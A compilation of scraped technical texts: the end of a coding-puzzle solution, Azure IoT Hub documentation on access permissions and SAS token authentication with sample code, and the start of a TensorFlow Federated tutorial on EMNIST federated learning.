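    print(s.maxProduct([2, 3, -2, 4]))  # expected 6
    print(s.maxProduct([-2, 0, -1]))    # expected 0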
Time complexity: O(n)
Space complexity: O(1)
|
Control access to IoT Hub
This article describes the options for securing your IoT hub. IoT Hub uses permissions to grant access to each IoT hub endpoint. Permissions limit the access to an IoT hub based on functionality.
This article introduces:
The different permissions that you can grant to a device or back-end app to access your IoT hub.
The authentication process and the tokens it uses to verify permissions.
How to scope credentials to limit access to specific resources.
IoT Hub support for X.509 certificates.
Custom device authentication mechanisms that use existing device identity registries or authentication schemes.
Note
Some of the features mentioned in this article, like cloud-to-device messaging, device twins, and device management, are only available in the standard tier of IoT Hub. For more information about the basic and standard IoT Hub tiers, see How to choose the right IoT Hub tier.
You must have appropriate permissions to access any of the IoT Hub endpoints. For example, a device must include a token containing security credentials along with every message it sends to IoT Hub.
Access control and permissions
IoT hub-level shared access policies. Shared access policies can grant any combination of permissions. You can define policies in the Azure portal, programmatically by using the IoT Hub Resource REST APIs, or by using the az iot hub policy CLI. A newly created IoT hub has the following default policies:
Shared Access Policy: Permissions
iothubowner: all permissions
service: ServiceConnect permission
device: DeviceConnect permission
registryRead: RegistryRead permission
registryReadWrite: RegistryRead and RegistryWrite permissions
Per-device security credentials. Each IoT hub contains an identity registry. For each device in this identity registry, you can configure security credentials that grant DeviceConnect permissions scoped to the corresponding device endpoints.
For example, in a typical IoT solution:
The device management component uses the registryReadWrite policy.
The event processor component uses the service policy.
The run-time device business logic component uses the service policy.
Individual devices connect using credentials stored in the IoT hub's identity registry.
Authentication
Azure IoT Hub grants access to endpoints by verifying a token against the shared access policies and identity registry security credentials.
Security credentials, such as symmetric keys, are never sent over the wire.
Note
The Azure IoT Hub resource provider is secured through your Azure subscription, as are all providers in the Azure Resource Manager.
For more information about how to construct and use security tokens, see IoT Hub security tokens.
Protocol specifics
Each supported protocol, such as MQTT, AMQP, and HTTPS, transports tokens in different ways.
When using MQTT, the CONNECT packet has the deviceId as the ClientId, {iothubhostname}/{deviceId} in the Username field, and a SAS token in the Password field. {iothubhostname} should be the full CName of the IoT hub (for example, contoso.azure-devices.net).
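As an illustration of how those MQTT fields are wired, here is a minimal sketch using the paho-mqtt client. The hub name, device id, and SAS token are placeholders, the username format simply follows the description above, and the Azure IoT SDKs normally handle all of this for you:

import ssl
import paho.mqtt.client as mqtt

hub = "contoso.azure-devices.net"   # placeholder IoT hub host name (full CName)
device_id = "myDevice"              # placeholder device id
sas_token = "SharedAccessSignature sr=...&sig=...&se=..."  # placeholder token

# paho-mqtt 1.x style constructor; ClientId = deviceId
client = mqtt.Client(client_id=device_id, protocol=mqtt.MQTTv311)
# Username = {iothubhostname}/{deviceId}, Password = SAS token
client.username_pw_set(username=hub + "/" + device_id, password=sas_token)
client.tls_set(cert_reqs=ssl.CERT_REQUIRED)  # IoT Hub requires TLS
client.connect(hub, port=8883)
client.loop_start()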
If you use AMQP claims-based security, the standard specifies how to transmit these tokens.
For SASL PLAIN, the username can be:
{policyName}@sas.root.{iothubName} if using IoT hub-level tokens.
{deviceId}@sas.{iothubname} if using device-scoped tokens.
In both cases, the password field contains the token, as described in IoT Hub security tokens.
HTTPS implements authentication by including a valid token in the Authorization request header.
Example
Username (DeviceId is case-sensitive): iothubname.azure-devices.net/DeviceId
Password (you can generate a SAS token with the CLI extension command az iot hub generate-sas-token, or with the Azure IoT Tools for Visual Studio Code):
SharedAccessSignature sr=iothubname.azure-devices.net%2fdevices%2fDeviceId&sig=kPszxZZZZZZZZZZZZZZZZZAhLT%2bV7o%3d&se=1487709501
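For instance, the CLI route mentioned above looks roughly like this; the hub name, device id, and duration are placeholders, and the exact flags may vary with the CLI extension version:

az iot hub generate-sas-token --hub-name iothubname --device-id DeviceId --duration 3600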
Note
The Azure IoT SDKs automatically generate tokens when connecting to the service. In some cases, the Azure IoT SDKs do not support all the protocols or all the authentication methods.
Special considerations for SASL PLAIN
When using SASL PLAIN with AMQP, a client connecting to an IoT hub can use a single token for each TCP connection. When the token expires, the TCP connection disconnects from the service and triggers a reconnection. This behavior, while not problematic for a back-end app, is damaging for a device app for the following reasons:
Gateways usually connect on behalf of many devices. When using SASL PLAIN, they have to create a distinct TCP connection for each device connecting to an IoT hub. This scenario considerably increases the consumption of power and networking resources, and increases the latency of each device connection.
Resource-constrained devices are adversely affected by the increased use of resources to reconnect after each token expiration.
Scope IoT hub-level credentials
You can scope IoT hub-level security policies by creating tokens with a restricted resource URI. For example, the endpoint to send device-to-cloud messages from a device is /devices/{deviceId}/messages/events. You can also use an IoT hub-level shared access policy with DeviceConnect permissions to sign a token whose resourceURI is /devices/{deviceId}. This approach creates a token that is only usable to send messages on behalf of device deviceId.
This mechanism is similar to the Event Hubs publisher policy, and it enables you to implement custom authentication methods.
Security tokens
IoT Hub uses security tokens to authenticate devices and services to avoid sending keys on the wire. Additionally, security tokens are limited in time validity and scope. Azure IoT SDKs automatically generate tokens without requiring any special configuration. Some scenarios do require you to generate and use security tokens directly. Such scenarios include:
The direct use of the MQTT, AMQP, or HTTPS surfaces.
The implementation of the token service pattern, as explained in Custom device authentication.
Security token structure
You use security tokens to grant time-bounded access for devices and services to specific functionality in IoT Hub. To get authorization to connect to IoT Hub, devices and services must send security tokens signed with either a shared access key or a symmetric key. These keys are stored with a device identity in the identity registry.
A token signed with a shared access key grants access to all the functionality associated with the shared access policy permissions. A token signed with a device identity's symmetric key only grants the DeviceConnect permission for the associated device identity.
The security token has the following format:
SharedAccessSignature sig={signature-string}&se={expiry}&skn={policyName}&sr={URL-encoded-resourceURI}
Here are the expected values:
Value  Description
{signature}  An HMAC-SHA256 signature string of the form: {URL-encoded-resourceURI} + "\n" + expiry. Important: The key is decoded from base64 and used as the key to perform the HMAC-SHA256 computation.
{resourceURI}  URI prefix (by segment) of the endpoints that can be accessed with this token, starting with the host name of the IoT hub (no protocol). For example, myHub.azure-devices.net/devices/device1
{expiry}  UTF8 string for the number of seconds since the epoch 00:00:00 UTC on 1 January 1970.
{URL-encoded-resourceURI}  Lower-case URL-encoding of the lower-case resource URI
{policyName}  The name of the shared access policy to which this token refers. Absent if the token refers to device-registry credentials.
Note on prefix: The URI prefix is computed by segment and not by character. For example /a/b is a prefix for /a/b/c but not for /a/bc.
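To make the segment rule concrete, here is a small illustrative Python check. It is not code from the service itself; the helper name is made up for this example.
def is_segment_prefix(prefix, uri):
    """Illustration only: True if `prefix` is a per-segment prefix of `uri`."""
    prefix_parts = prefix.strip('/').split('/')
    uri_parts = uri.strip('/').split('/')
    return uri_parts[:len(prefix_parts)] == prefix_parts

print(is_segment_prefix('/a/b', '/a/b/c'))   # True
print(is_segment_prefix('/a/b', '/a/bc'))    # False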
The following Node.js snippet shows a function called generateSasToken that computes the token from the inputs resourceUri, signingKey, policyName, expiresInMins. The next sections detail how to initialize the different inputs for the different token use cases.
// Requires Node's built-in crypto module for the HMAC computation
var crypto = require('crypto');

var generateSasToken = function(resourceUri, signingKey, policyName, expiresInMins) {
resourceUri = encodeURIComponent(resourceUri);
// Set expiration in seconds
var expires = (Date.now() / 1000) + expiresInMins * 60;
expires = Math.ceil(expires);
var toSign = resourceUri + '\n' + expires;
// Use crypto
var hmac = crypto.createHmac('sha256', Buffer.from(signingKey, 'base64'));
hmac.update(toSign);
var base64UriEncoded = encodeURIComponent(hmac.digest('base64'));
// Construct authorization string
var token = "SharedAccessSignature sr=" + resourceUri + "&sig="
+ base64UriEncoded + "&se=" + expires;
if (policyName) token += "&skn="+policyName;
return token;
};
As a comparison, the equivalent Python code to generate a security token is:
from base64 import b64encode, b64decode
from hashlib import sha256
from time import time
from urllib import parse
from hmac import HMAC
def generate_sas_token(uri, key, policy_name, expiry=3600):
ttl = time() + expiry
sign_key = "%s\n%d" % ((parse.quote_plus(uri)), int(ttl))
print(sign_key)
signature = b64encode(HMAC(b64decode(key), sign_key.encode('utf-8'), sha256).digest())
rawtoken = {
'sr' : uri,
'sig': signature,
'se' : str(int(ttl))
}
if policy_name is not None:
rawtoken['skn'] = policy_name
return 'SharedAccessSignature ' + parse.urlencode(rawtoken)
The functionality in C# to generate a security token is:
using System;
using System.Globalization;
using System.Net;
using System.Net.Http;
using System.Security.Cryptography;
using System.Text;
public static string generateSasToken(string resourceUri, string key, string policyName, int expiryInSeconds = 3600)
{
TimeSpan fromEpochStart = DateTime.UtcNow - new DateTime(1970, 1, 1);
string expiry = Convert.ToString((int)fromEpochStart.TotalSeconds + expiryInSeconds);
string stringToSign = WebUtility.UrlEncode(resourceUri) + "\n" + expiry;
HMACSHA256 hmac = new HMACSHA256(Convert.FromBase64String(key));
string signature = Convert.ToBase64String(hmac.ComputeHash(Encoding.UTF8.GetBytes(stringToSign)));
string token = String.Format(CultureInfo.InvariantCulture, "SharedAccessSignature sr={0}&sig={1}&se={2}", WebUtility.UrlEncode(resourceUri), WebUtility.UrlEncode(signature), expiry);
if (!String.IsNullOrEmpty(policyName))
{
token += "&skn=" + policyName;
}
return token;
}
For Java:
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.time.Instant;
import java.util.Base64;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

public static String generateSasToken(String resourceUri, String key) throws Exception {
// Token will expire in one hour
var expiry = Instant.now().getEpochSecond() + 3600;
String stringToSign = URLEncoder.encode(resourceUri, StandardCharsets.UTF_8) + "\n" + expiry;
byte[] decodedKey = Base64.getDecoder().decode(key);
Mac sha256HMAC = Mac.getInstance("HmacSHA256");
SecretKeySpec secretKey = new SecretKeySpec(decodedKey, "HmacSHA256");
sha256HMAC.init(secretKey);
Base64.Encoder encoder = Base64.getEncoder();
String signature = new String(encoder.encode(
sha256HMAC.doFinal(stringToSign.getBytes(StandardCharsets.UTF_8))), StandardCharsets.UTF_8);
String token = "SharedAccessSignature sr=" + URLEncoder.encode(resourceUri, StandardCharsets.UTF_8)
+ "&sig=" + URLEncoder.encode(signature, StandardCharsets.UTF_8.name()) + "&se=" + expiry;
return token;
}
Note
Since the time validity of the token is validated on the IoT Hub machines, the clock drift on the machine that generates the token must be minimal.
Use SAS tokens in a device app
There are two ways to obtain DeviceConnect permissions with IoT Hub with security tokens: use a symmetric device key from the identity registry, or use a shared access key.
Remember that all functionality accessible from devices is exposed by design on endpoints with the prefix /devices/{deviceId}.
Important
The only way that IoT Hub authenticates a specific device is using the device identity symmetric key. In cases when a shared access policy is used to access device functionality, the solution must consider the component issuing the security token as a trusted subcomponent.
The device-facing endpoints are (irrespective of the protocol):
Endpoint  Functionality
{iot hub host name}/devices/{deviceId}/messages/events  Send device-to-cloud messages.
{iot hub host name}/devices/{deviceId}/messages/devicebound  Receive cloud-to-device messages.
Use a symmetric key in the identity registry
When using a device identity's symmetric key to generate a token, the policyName (skn) element of the token is omitted.
For example, a token created to access all device functionality should have the following parameters:
resource URI: {IoT hub name}.azure-devices.net/devices/{device id},
signing key: any symmetric key for the {device id} identity,
no policy name,
any expiration time.
An example using the preceding Node.js function would be:
var endpoint ="myhub.azure-devices.net/devices/device1";
var deviceKey ="...";
var token = generateSasToken(endpoint, deviceKey, null, 60);
The result, which grants access to all functionality for device1, would be:
SharedAccessSignature sr=myhub.azure-devices.net%2fdevices%2fdevice1&sig=13y8ejUk2z7PLmvtwR5RqlGBOVwiq7rQR3WZ5xZX3N4%3D&se=1456971697
Note
It's possible to generate a SAS token with the CLI extension command az iot hub generate-sas-token, or with the Azure IoT Tools for Visual Studio Code.
Use a shared access policy
When you create a token from a shared access policy, set the skn field to the name of the policy. This policy must grant the DeviceConnect permission.
The two main scenarios for using shared access policies to access device functionality are:
cloud protocol gateways,
token services used to implement custom authentication schemes.
Since the shared access policy can potentially grant access to connect as any device, it is important to use the correct resource URI when creating security tokens. This setting is especially important for token services, which have to scope the token to a specific device using the resource URI. This point is less relevant for protocol gateways, as they already mediate traffic for all devices.
As an example, a token service using the pre-created shared access policy called device would create a token with the following parameters:
resource URI: {IoT hub name}.azure-devices.net/devices/{device id},
signing key: one of the keys of the device policy,
policy name: device,
any expiration time.
An example using the preceding Node.js function would be:
var endpoint ="myhub.azure-devices.net/devices/device1";
var policyName = 'device';
var policyKey = '...';
var token = generateSasToken(endpoint, policyKey, policyName, 60);
The result, which grants access to all functionality for device1, would be:
SharedAccessSignature sr=myhub.azure-devices.net%2fdevices%2fdevice1&sig=13y8ejUk2z7PLmvtwR5RqlGBOVwiq7rQR3WZ5xZX3N4%3D&se=1456971697&skn=device
A protocol gateway could use the same token for all devices, simply setting the resource URI to myhub.azure-devices.net/devices.
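For illustration, using the Python generate_sas_token function shown earlier (the key value below is a placeholder, and the policy name is assumed to be an existing policy with DeviceConnect permission), a gateway-wide token could be created like this:
# Hypothetical example: one token scoped to all devices, for a protocol gateway.
endpoint = 'myhub.azure-devices.net/devices'
policy_name = 'device'     # assumed shared access policy with DeviceConnect permission
policy_key = '...'         # one of that policy's keys (placeholder)

gateway_token = generate_sas_token(endpoint, policy_key, policy_name, expiry=3600)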
Use security tokens from service components
Service components can only generate security tokens using shared access policies that grant the appropriate permissions, as explained previously.
Here are the service functions exposed on the endpoints:
Endpoint  Functionality
{iot hub host name}/devices  Create, update, retrieve, and delete device identities.
{iot hub host name}/messages/events  Receive device-to-cloud messages.
{iot hub host name}/servicebound/feedback  Receive feedback for cloud-to-device messages.
{iot hub host name}/devicebound  Send cloud-to-device messages.
As an example, a service using the pre-created shared access policy called registryRead would create a token with the following parameters:
resource URI: {IoT hub name}.azure-devices.net/devices,
signing key: one of the keys of the registryRead policy,
policy name: registryRead,
any expiration time.
var endpoint ="myhub.azure-devices.net/devices";
var policyName = 'registryRead';
var policyKey = '...';
var token = generateSasToken(endpoint, policyKey, policyName, 60);
The result, which would grant access to read all device identities, would be:
SharedAccessSignature sr=myhub.azure-devices.net%2fdevices&sig=JdyscqTpXdEJs49elIUCcohw2DlFDR3zfH5KqGJo4r4%3D&se=1456973447&skn=registryRead
Supported X.509 certificates
You can use any X.509 certificate to authenticate a device with IoT Hub by uploading either a certificate thumbprint or a certificate authority (CA) to Azure IoT Hub. Authentication using certificate thumbprints verifies that the presented thumbprint matches the configured thumbprint. Authentication using a certificate authority validates the certificate chain. Either way, the TLS handshake requires the device to have a valid certificate and private key. Refer to the TLS specification for details, for example: RFC 5246 - The Transport Layer Security (TLS) Protocol Version 1.2.
Supported certificates include:
An existing X.509 certificate. A device may already have an X.509 certificate associated with it. The device can use this certificate to authenticate with IoT Hub. Works with either thumbprint or CA authentication.
CA-signed X.509 certificate. To identify a device and authenticate it with IoT Hub, you can use an X.509 certificate generated and signed by a certification authority (CA). Works with either thumbprint or CA authentication.
A self-generated and self-signed X.509 certificate. A device manufacturer or in-house deployer can generate these certificates and store the corresponding private key (and certificate) on the device. You can use tools such as OpenSSL and the Windows SelfSignedCertificate utility for this purpose. Only works with thumbprint authentication.
A device may use either an X.509 certificate or a security token for authentication, but not both. With X.509 certificate authentication, make sure you have a strategy in place to handle certificate rollover when an existing certificate expires.
The following functionality is not supported for devices that use X.509 CA authentication:
HTTPS, MQTT over WebSockets, and AMQP over WebSockets protocols.
File uploads (all protocols).
For more information about authentication using a certificate authority, see Device Authentication using X.509 CA Certificates. For information about how to upload and verify a certificate authority with your IoT hub, see Set up X.509 security in your Azure IoT hub.
Register an X.509 certificate for a device
The Azure IoT Service SDK for C# (version 1.0.8+) supports registering a device that uses an X.509 certificate for authentication. Other APIs, such as import/export of devices, also support X.509 certificates.
You can also use the CLI extension command az iot hub device-identity to configure X.509 certificates for devices.
C# support
The RegistryManager class provides a programmatic way to register a device. In particular, the AddDeviceAsync and UpdateDeviceAsync methods enable you to register and update a device in the IoT Hub identity registry. These two methods take a Device instance as input. The Device class includes an Authentication property that allows you to specify primary and secondary X.509 certificate thumbprints. The thumbprint represents a SHA256 hash of the X.509 certificate (stored using binary DER encoding). You have the option of specifying a primary thumbprint, a secondary thumbprint, or both. Primary and secondary thumbprints are supported to handle certificate rollover scenarios.
Here is a sample C# code snippet to register a device using an X.509 certificate thumbprint:
var device = new Device(deviceId)
{
Authentication = new AuthenticationMechanism()
{
X509Thumbprint = new X509Thumbprint()
{
PrimaryThumbprint = "B4172AB44C28F3B9E117648C6F7294978A00CDCBA34A46A1B8588B3F7D82C4F1"
}
}
};
RegistryManager registryManager = RegistryManager.CreateFromConnectionString(deviceGatewayConnectionString);
await registryManager.AddDeviceAsync(device);
Use an X.509 certificate during run-time operations
C# support
The DeviceAuthenticationWithX509Certificate class supports the creation of DeviceClient instances using an X.509 certificate. The X.509 certificate must be in the PFX (also called PKCS #12) format, which includes the private key.
Here is a sample code snippet:
var authMethod = new DeviceAuthenticationWithX509Certificate("<device id>", x509Certificate);
var deviceClient = DeviceClient.Create("<IotHub DNS HostName>", authMethod);
Custom device and module authentication
You can use the IoT Hub identity registry to configure per-device/module security credentials and access control using tokens. If an IoT solution already has a custom identity registry and/or authentication scheme, consider creating a token service to integrate this infrastructure with IoT Hub. In this way, you can use other IoT features in your solution.
A token service is a custom cloud service. It uses an IoT Hub shared access policy with DeviceConnect or ModuleConnect permissions to create device-scoped or module-scoped tokens. These tokens enable a device or module to connect to your IoT hub.
Here are the main steps of the token service pattern (a minimal sketch follows the list):
Create an IoT Hub shared access policy with DeviceConnect or ModuleConnect permissions for your IoT hub. You can create this policy in the Azure portal or programmatically. The token service uses this policy to sign the tokens it creates.
When a device/module needs to access your IoT hub, it requests a signed token from your token service. The device can authenticate with your custom identity registry/authentication scheme to determine the device/module identity that the token service uses to create the token.
The token service returns a token. The token is created by using /devices/{deviceId} or /devices/{deviceId}/module/{moduleId} as the resourceURI, with deviceId as the device being authenticated or moduleId as the module being authenticated. The token service uses the shared access policy to construct the token.
The device/module uses the token directly with the IoT hub.
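To make the flow concrete, here is a minimal sketch of a token service endpoint in Python. It reuses the generate_sas_token function from the earlier Python snippet; the Flask app, the authenticate_device helper, and the policy name 'device' are hypothetical placeholders for your own identity registry and shared access policy. This is an illustration of the pattern, not a production implementation.
# Sketch of a token service endpoint (hypothetical names, not a production design).
# Assumes generate_sas_token() from the earlier Python snippet is available, and
# that a shared access policy named 'device' with DeviceConnect permission exists.
from flask import Flask, request, jsonify, abort

app = Flask(__name__)

IOT_HUB_HOST = 'myhub.azure-devices.net'   # your IoT hub host name (placeholder)
DEVICE_POLICY_NAME = 'device'              # shared access policy with DeviceConnect
DEVICE_POLICY_KEY = '...'                  # one of that policy's keys (placeholder)

def authenticate_device(req):
    """Hypothetical hook into your custom identity registry / auth scheme.

    Returns the deviceId the caller is allowed to act as, or None.
    """
    raise NotImplementedError

@app.route('/token', methods=['POST'])
def issue_token():
    device_id = authenticate_device(request)
    if device_id is None:
        abort(401)
    # Scope the token to a single device by using /devices/{deviceId} as resourceURI.
    resource_uri = '{}/devices/{}'.format(IOT_HUB_HOST, device_id)
    token = generate_sas_token(resource_uri, DEVICE_POLICY_KEY,
                               DEVICE_POLICY_NAME, expiry=3600)
    return jsonify({'token': token})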
Note
You can use the .NET class SharedAccessSignatureBuilder or the Java class IotHubServiceSasToken to create a token in your token service.
The token service can set the token expiration as desired. When the token expires, the IoT hub severs the device/module connection. Then, the device/module must request a new token from the token service. A short expiry time increases the load on both the device/module and the token service.
For a device/module to connect to your hub, you must still add it to the IoT Hub identity registry, even though it is using a token and not a key to connect. Therefore, you can continue to use per-device/per-module access control by enabling or disabling device/module identities in the identity registry. This approach mitigates the risks of using tokens with long expiry times.
Comparison with a custom gateway
The token service pattern is the recommended way to implement a custom identity registry/authentication scheme with IoT Hub. This pattern is recommended because IoT Hub continues to handle most of the solution traffic. However, if the custom authentication scheme is deeply intertwined with the protocol, you may require a custom gateway to process all the traffic. An example of such a scenario is using Transport Layer Security (TLS) and pre-shared keys (PSKs). For more information, see the protocol gateway article.
Reference topics:
The following reference topics provide you with more information about controlling access to your IoT hub.
IoT Hub permissions
The following table lists the permissions you can use to control access to your IoT hub.
Permission  Notes
RegistryRead  Grants read access to the identity registry. For more information, see Identity registry.
This permission is used by back-end cloud services.
RegistryReadWrite  Grants read and write access to the identity registry. For more information, see Identity registry.
This permission is used by back-end cloud services.
ServiceConnect  Grants access to cloud service-facing communication and monitoring endpoints.
Grants permission to receive device-to-cloud messages, send cloud-to-device messages, and retrieve the corresponding delivery acknowledgments.
Grants permission to retrieve delivery acknowledgments for file uploads.
Grants permission to access twins to update tags and desired properties, retrieve reported properties, and run queries.
This permission is used by back-end cloud services.
DeviceConnect  Grants access to device-facing endpoints.
Grants permission to send device-to-cloud messages and receive cloud-to-device messages.
Grants permission to perform file upload from a device.
Grants permission to receive device twin desired property notifications and update device twin reported properties.
Grants permission to perform file uploads.
This permission is used by devices.
Additional reference material
Other reference topics in the IoT Hub developer guide include:
IoT Hub endpoints describes the various endpoints that each IoT hub exposes for run-time and management operations.
Throttling and quotas describes the quotas and throttling behaviors that apply to the IoT Hub service.
Azure IoT device and service SDKs lists the various language SDKs you can use when you develop both device and service apps that interact with IoT Hub.
IoT Hub query language describes the query language you can use to retrieve information from IoT Hub about your device twins and jobs.
RFC 5246 - The Transport Layer Security (TLS) Protocol Version 1.2 provides more information about TLS authentication.
Next steps
Now that you have learned how to control access to IoT Hub, you may be interested in the following IoT Hub developer guide topics:
Use device twins to synchronize state and configurations
Invoke a direct method on a device
Schedule jobs on multiple devices
If you would like to try out some of the concepts described in this article, see the following IoT Hub tutorials:
|
In this tutorial, we use the classic MNIST training example to introduce the Federated Learning (FL) API layer of TFF, tff.learning: a set of higher-level interfaces that can be used to perform common types of federated learning tasks, such as federated training against user-supplied models implemented in TensorFlow.
This tutorial, and the Federated Learning API, are intended primarily for users who want to plug their own TensorFlow models into TFF, treating the latter mostly as a black box. For a more in-depth understanding of TFF and how to implement your own federated learning algorithms, see the tutorials on the FC Core API - Custom Federated Algorithms Part 1 and Part 2.
For more on tff.learning, continue with Federated Learning for Text Generation, a tutorial which, in addition to covering recurrent models, also demonstrates loading a pre-trained serialized Keras model for refinement with federated learning combined with evaluation using Keras.
Before we start
Before we start, please run the following to make sure that your environment is correctly set up. If you don't see a greeting, please refer to the Installation guide for instructions.
# tensorflow_federated_nightly also bring in tf_nightly, which
# can causes a duplicate tensorboard install, leading to errors.
!pip uninstall --yes tensorboard tb-nightly
!pip install --quiet --upgrade tensorflow_federated_nightly
!pip install --quiet --upgrade nest_asyncio
!pip install --quiet tb-nightly # or tensorboard, but not both
import nest_asyncio
nest_asyncio.apply()
%load_ext tensorboard
Fetching TensorBoard MPM... done.
import collections
import numpy as np
import tensorflow as tf
import tensorflow_federated as tff
np.random.seed(0)
tff.federated_computation(lambda: 'Hello, World!')()
b'Hello, World!'
Preparing the input data
Let's start with the data. Federated learning requires a federated data set, i.e., a collection of data from multiple users. Federated data is typically non-i.i.d., which poses a unique set of challenges.
In order to facilitate experimentation, we seeded the TFF repository with a few datasets, including a federated version of MNIST that contains a version of the original NIST dataset that has been re-processed using Leaf so that the data is keyed by the original writer of the digits. Since each writer has a unique style, this dataset exhibits the kind of non-i.i.d. behavior expected of federated datasets.
Here's how we can load it.
emnist_train, emnist_test = tff.simulation.datasets.emnist.load_data()
The data sets returned by load_data() are instances of tff.simulation.ClientData, an interface that allows you to enumerate the set of users, to construct a tf.data.Dataset that represents the data of a particular user, and to query the structure of individual elements. Here's how you can use this interface to explore the content of the dataset. Keep in mind that while this interface allows you to iterate over client ids, this is only a feature of the simulation data. As you will see shortly, client identities are not used by the federated learning framework; their only purpose is to allow you to select subsets of the data for simulations.
len(emnist_train.client_ids)
3383
emnist_train.element_type_structure
OrderedDict([('pixels', TensorSpec(shape=(28, 28), dtype=tf.float32, name=None)), ('label', TensorSpec(shape=(), dtype=tf.int32, name=None))])
example_dataset = emnist_train.create_tf_dataset_for_client(
emnist_train.client_ids[0])
example_element = next(iter(example_dataset))
example_element['label'].numpy()
1
from matplotlib import pyplot as plt
plt.imshow(example_element['pixels'].numpy(), cmap='gray', aspect='equal')
plt.grid(False)
_ = plt.show()
Exploring heterogeneity in federated data
Federated data is typically non-i.i.d.; users typically have different distributions of data depending on usage patterns. Some clients may have fewer training examples on device, suffering from data paucity locally, while some clients will have more than enough training examples. Let's explore this concept of data heterogeneity typical of a federated system with the EMNIST data we have available. It's important to note that this deep analysis of a client's data is only available to us because this is a simulation environment where all the data is available to us locally. In a real production federated environment, you would not be able to inspect a single client's data.
First, let's grab a sampling of one client's data to get a feel for the examples on one simulated device. Because the dataset we're using has been keyed by unique writer, the data of one client represents the handwriting of one person for a sample of the digits 0 through 9, simulating the unique "usage pattern" of one user.
## Example MNIST digits for one client
figure = plt.figure(figsize=(20, 4))
j = 0
for example in example_dataset.take(40):
plt.subplot(4, 10, j+1)
plt.imshow(example['pixels'].numpy(), cmap='gray', aspect='equal')
plt.axis('off')
j += 1
Now let's visualize the number of examples on each client for each MNIST digit label. In the federated environment, the number of examples on each client can vary quite a bit, depending on user behavior.
# Number of examples per label for a sample of clients
f = plt.figure(figsize=(12, 7))
f.suptitle('Label Counts for a Sample of Clients')
for i in range(6):
client_dataset = emnist_train.create_tf_dataset_for_client(
emnist_train.client_ids[i])
plot_data = collections.defaultdict(list)
for example in client_dataset:
# Append counts individually per label to make plots
# more colorful instead of one color per plot.
label = example['label'].numpy()
plot_data[label].append(label)
plt.subplot(2, 3, i+1)
plt.title('Client {}'.format(i))
for j in range(10):
plt.hist(
plot_data[j],
density=False,
bins=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
Now let's visualize the mean image per client for each MNIST label. This code will produce the mean of each pixel value for all of the user's examples for one label. We'll see that one client's mean image for a digit will look different than another client's mean image for the same digit, due to each person's unique handwriting style. We can muse about how each local training round will nudge the model in a different direction on each client, as we're learning from that user's own unique data in that local round. Later in the tutorial, we'll see how we can take each update to the model from all the clients and aggregate them together into our new global model that has learned from each of our clients' unique data.
# Each client has different mean images, meaning each client will be nudging
# the model in their own directions locally.
for i in range(5):
client_dataset = emnist_train.create_tf_dataset_for_client(
emnist_train.client_ids[i])
plot_data = collections.defaultdict(list)
for example in client_dataset:
plot_data[example['label'].numpy()].append(example['pixels'].numpy())
f = plt.figure(i, figsize=(12, 5))
f.suptitle("Client #{}'s Mean Image Per Label".format(i))
for j in range(10):
mean_img = np.mean(plot_data[j], 0)
plt.subplot(2, 5, j+1)
plt.imshow(mean_img.reshape((28, 28)))
plt.axis('off')
User data can be noisy and unreliably labeled. For example, looking at Client #2's data above, we can see that for label 2, it is possible that there may have been some mislabeled examples creating a noisier mean image.
Preprocessing the input data
Since the data is already a tf.data.Dataset, preprocessing can be accomplished using Dataset transformations. Here, we flatten the 28x28 images into 784-element arrays, shuffle the individual examples, organize them into batches, and rename the features from pixels and label to x and y for use with Keras. We also throw in a repeat over the data set to run several epochs.
NUM_CLIENTS = 10
NUM_EPOCHS = 5
BATCH_SIZE = 20
SHUFFLE_BUFFER = 100
PREFETCH_BUFFER = 10
def preprocess(dataset):
def batch_format_fn(element):
"""Flatten a batch `pixels` and return the features as an `OrderedDict`."""
return collections.OrderedDict(
x=tf.reshape(element['pixels'], [-1, 784]),
y=tf.reshape(element['label'], [-1, 1]))
return dataset.repeat(NUM_EPOCHS).shuffle(SHUFFLE_BUFFER).batch(
BATCH_SIZE).map(batch_format_fn).prefetch(PREFETCH_BUFFER)
Let's verify this worked.
preprocessed_example_dataset = preprocess(example_dataset)
sample_batch = tf.nest.map_structure(lambda x: x.numpy(),
next(iter(preprocessed_example_dataset)))
sample_batch
OrderedDict([('x', array([[1., 1., 1., ..., 1., 1., 1.], [1., 1., 1., ..., 1., 1., 1.], [1., 1., 1., ..., 1., 1., 1.], ..., [1., 1., 1., ..., 1., 1., 1.], [1., 1., 1., ..., 1., 1., 1.], [1., 1., 1., ..., 1., 1., 1.]], dtype=float32)), ('y', array([[0], [5], [0], [1], [3], [0], [5], [4], [1], [7], [0], [4], [0], [1], [7], [2], [2], [0], [7], [1]], dtype=int32))])
We have almost all the building blocks in place to construct federated data sets.
One of the ways to feed federated data to TFF in a simulation is simply as a Python list, with each element of the list holding the data of an individual user, whether as a list or as a tf.data.Dataset. Since we already have an interface that provides the latter, let's use it.
Here's a simple helper function that will construct a list of datasets from the given set of users as an input to a round of training or evaluation.
def make_federated_data(client_data, client_ids):
return [
preprocess(client_data.create_tf_dataset_for_client(x))
for x in client_ids
]
Now, how do we choose clients?
In a typical federated training scenario, we are dealing with potentially a very large population of user devices, only a fraction of which may be available for training at a given point in time. This is the case, for example, when the client devices are mobile phones that participate in training only when plugged into a power source, off a metered network, and otherwise idle.
Of course, we are in a simulation environment, and all the data is locally available. Typically then, when running simulations, we would simply sample a random subset of the clients to be involved in each round of training, generally different in each round.
That said, as you can find out by studying the paper on the Federated Averaging algorithm, achieving convergence in a system with randomly sampled subsets of clients in each round can take a while, and it would be impractical to have to run hundreds of rounds in this interactive tutorial.
What we'll do instead is sample the set of clients once, and reuse the same set across rounds to speed up convergence (intentionally over-fitting to these few users' data). We leave it as an exercise for the reader to modify this tutorial to simulate random sampling; it is fairly easy to do (once you do, keep in mind that getting the model to converge may take a while), and a minimal sketch follows below.
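If you do want to try the random-sampling variant, one possible sketch (using the helpers defined above; the per-round call is only shown as a comment because the training loop is introduced later in this tutorial) might look like the following. The tutorial itself sticks with a single fixed sample.
# Sketch only: resample a new subset of clients for every round (slower to converge).
def sample_federated_data(client_data, num_clients):
    sampled_ids = np.random.choice(
        client_data.client_ids, size=num_clients, replace=False)
    return make_federated_data(client_data, sampled_ids)

# Inside the training loop shown later, you would then call, for each round:
#   federated_train_data = sample_federated_data(emnist_train, NUM_CLIENTS)
#   state, metrics = iterative_process.next(state, federated_train_data)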
sample_clients = emnist_train.client_ids[0:NUM_CLIENTS]
federated_train_data = make_federated_data(emnist_train, sample_clients)
